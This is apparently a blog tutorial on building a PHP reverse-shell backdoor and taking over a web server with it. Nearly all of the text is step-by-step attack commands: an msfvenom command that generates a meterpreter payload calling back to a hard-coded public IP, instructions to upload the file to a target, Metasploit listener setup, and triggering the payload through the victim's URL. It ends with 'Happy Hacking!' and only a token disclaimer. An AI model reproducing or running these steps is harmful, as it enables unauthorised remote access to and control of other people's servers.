we going to teach you how to manually create a PHP backdoor for Metasploit and then how to exploit it
How it works?
php-reverse-shell. This tool is designed for those situations during a pentest where you have upload access to a webserver that's running PHP. ... It differs from web form-based shell which allows you to send a single command, then returns you the output.
Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.
In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.
To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.
listener (hacker machine) ++--- reverse shell payload (victim machine)
Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.
Lets Start
Task 1 Creating PHP Payload
So the first step is to create our payload program. This is done using the msfpayload command and looks like this
msfvenom -p php/meterpreter/reverse_tcp LHOST=3.21.94.26 LPORT=1337 R > exploit.php
The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.
or
You can create or configure file Manually using this script →
Download script
Note:- Here I'm using static public IP in your environment you have to port forward if don't have static IP
Now upload the exploit.php to the target system.
Task 2 Starting listener
Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer.
Step 1:- Start
msfconsole and run the following commands
msfconsole
Step 2:- Use multi/handler using following command
use exploit/multi/handler
Step 3:- set payload Type following command
set payload php/meterpreter/reverse_tcp
Step 4:- set localhost (here is your machine address)
set lhost 3.21.94.26
Step 5:- set local port number
set lport 1337
Step 6:- start listener using following command
exploit
Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.
http://targetmachine/some/path/exploit.php
http://targetmachine/some/path/exploit.php
As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come upNow that meterpreter is up, its time to play with the system.
__________________________
Happy Hacking! (Please do not spam it, It's Just For Knowledge ...)
